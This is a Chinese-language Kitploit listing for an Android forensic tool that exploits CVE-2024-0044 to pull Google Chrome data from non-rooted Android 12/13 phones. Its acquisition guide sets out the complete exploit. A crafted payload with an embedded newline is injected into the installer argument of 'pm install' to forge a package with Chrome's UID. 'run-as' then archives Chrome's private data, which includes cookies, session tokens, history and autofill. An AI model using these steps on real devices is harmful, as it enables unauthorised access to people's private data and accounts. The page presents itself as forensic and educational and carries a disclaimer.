Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Chrome-Forensic_CVE-2024-0044 — 一个强大的数字取证工具,用于从 Android 设备中提取和分析 Google Chrome 痕迹 | Kitploit
工具/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Android安全漏洞分析漏洞利用取证分析移动取证数据恢复数字取证移动安全学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
jacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

一个强大的数字取证工具,用于从 Android 设备中提取和分析 Google Chrome 痕迹

查看仓库
1108个月前尚未审核

🔍 Chrome 取证 - CVE-2024-0044

Version Python License Platform

一款功能强大的数字取证工具,用于从 Android 设备中提取和分析 Google Chrome 的取证数据

功能与输出 • 安装 • 数据获取指南 • 文档


👤 作者信息

作者: JackTekno
GitHub: github.com/JackTekno


📋 概述

该工具利用 CVE-2024-0044(Run-as)漏洞,绕过非 root 的 Android 12/13 设备上的权限限制,从而能够取证提取 Google Chrome 数据。该工具可解析原始 SQLite 数据库并生成全面的分析报告。

🔄 处理流程

取证分析流程图

从数据采集到报告生成的完整取证分析工作流程


📊 功能与输出

该工具生成一份全面的 Excel 报告(result_chrome_forensic.xlsx),包含以下工作表:


🛠️ 前置条件

硬件要求

  • 📱 Android 手机(Android 12/13)
  • 💻 电脑(Linux/Windows/Mac)

测试环境

  • 🐧 操作系统:Linux UOS 20 专业版

软件要求

  • 🐍 Python 3.x
  • 📲 ADB(Android 调试桥)
  • 📦 虚拟 APK 文件(例如 F-Droid.apk)

🚀 安装

  1. 克隆仓库

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. 安装依赖

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 数据获取指南

第 1 步:准备设备

  1. 进入 设置 → 关于手机
  2. 连续点击 版本号 7 次以启用开发者选项
  3. 进入 设置 → 系统 → 开发者选项
  4. 启用 USB 调试
  5. 通过 USB 将手机连接到电脑并授权连接

第 2 步:准备漏洞利用

root@kitploit:~
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk

第 3 步:查找目标 UID

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)

第 4 步:执行漏洞利用

⚠️ 将 10129 替换为第 3 步中得到的实际 Chrome UID

root@kitploit:~
adb shell

# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

第 5 步:提取数据

root@kitploit:~
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Exit ADB Shell
exit

第 6 步:将数据拉取到电脑

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

第 7 步:解包数据

在项目文件夹中解压 'chrome.tar' 文件。您无需手动移动文件。Python 脚本会在解压后的文件夹中自动找到数据库文件。

root@kitploit:~
tar -xf chrome.tar

💻 使用方法

运行取证分析工具:

root@kitploit:~
python3 chrome_forensic.py

该工具将分析数据库文件,并在同一目录下生成 result_chrome_forensic.xlsx。


⚖️ 法律免责声明

⚠️ 重要提示: 此工具仅用于教育和经授权的取证分析目的。

  • 仅可对您拥有或已获得明确书面许可分析的设备使用
  • 未经授权访问数字设备可能违反您所在司法辖区的法律
  • 作者不对误用此工具承担任何责任

🤝 贡献

欢迎贡献!请随时提交 Pull Request。


📄 许可证

本项目采用 GNU 通用公共许可证 v3.0 授权。 详情请参阅 LICENSE 文件。


👤 致谢

该采集方法的概念验证(PoC)由 Tinyhack.com 总结并分享。


由 JackTekno 用 ❤️ 制作

⭐ 为本仓库标星 • 🐛 报告 Bug • 💡 请求新功能

下载工具
工作表名称描述
📖 浏览历史已访问 URL 的详细时间线
📈 分析 – 热门网站访问量最高的域名的统计排名
⚠️ 警报 – 可疑自动标记的 URL(黑客、毒品、成人内容)
📥 下载记录包含路径和文件大小的下载历史
🔍 搜索词条来自地址栏/Google 的用户搜索查询
🍪 Cookies 与会话会话令牌和 Cookie 元数据(Hex 加密)
✍️ 自动填充数据已保存的表单数据(姓名、地址等)